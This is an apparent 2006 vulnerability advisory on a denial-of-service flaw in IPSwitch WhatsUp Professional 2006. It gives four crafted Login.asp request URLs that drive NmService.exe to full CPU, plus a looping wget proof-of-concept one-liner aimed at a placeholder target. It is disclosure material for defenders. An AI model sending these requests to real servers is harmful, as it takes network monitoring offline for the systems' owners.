IpSwitch WhatsUp Professional 2006 DoS

2006-02-24T00:00:00
ID SECURITYVULNS:DOC:11563
Type securityvulns
Reporter Securityvulns
Modified 2006-02-24T00:00:00

Description

Synopsis: IPSwitch WhatsUp Professional 2006 DoS Flaw

Product: IPSwitch WhatsUp http://www.ipswitch.com

Version: Confirmed on WhatsUp Professional 2006

Author: Josh Zlatin-Amishav

Date: February 22, 2006

Background: WhatsUp Professional 2006 is application and network management that keeps your critical business technology, like email servers and databases, working efficiently so you can run your business.

Issue: The NmService.exe executable does not handle certain requests properly. The following URLs can be used to create a DoS condition due to the NmService using 100% CPU

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=

PoC:

while [ 1 ]; do wget -O /dev/null http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=; done

References: http://www.ipswitch.com http://zur.homelinux.com/Advisories/ipswitch_dos.txt